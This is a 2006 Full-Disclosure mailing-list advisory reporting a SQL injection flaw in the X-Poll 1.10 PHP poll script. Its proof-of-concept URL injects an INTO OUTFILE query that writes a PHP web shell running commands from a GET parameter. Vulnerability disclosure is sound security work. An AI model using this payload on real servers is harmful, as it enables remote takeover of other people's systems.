[<prev] [next>] [day] [month] [year] [list]
Message-ID: <8ba534860607292145g6c5a9ef2jaf4c970cc3f4a76a@mail.gmail.com>
Date: Sat, 29 Jul 2006 23:45:57 -0500
From: SirDarckCat <sirdarckcat@...il.com>
To: vuldb@...urityfocus.com, vuln@...unia.com,
full-disclosure@...ts.grok.org.uk
Cc:
Subject: X-Poll SQL Injection Vulnerability
Discovered by Sirdarckcat from elhacker.net
X-Poll 1.10
http://members.lycos.co.uk/xscripts03/
==============================================
X-Poll is a simple poll maker for simple PHP
web sites.
This has a SQL Injection vulnerability.
==============================================
PoC:
http://www.server.com/poll/top.php?poll=' AND 0 UNION SELECT 0,
'%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7,
8,'' INTO OUTFILE '/usr/webserver/public_htm/rshell.php
==============================================
Att.
Sirdarckcat
elhacker.net
--
Att.
SirDarckCat@...il.com
http://www.google.com/search?q=sirdarckcat
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists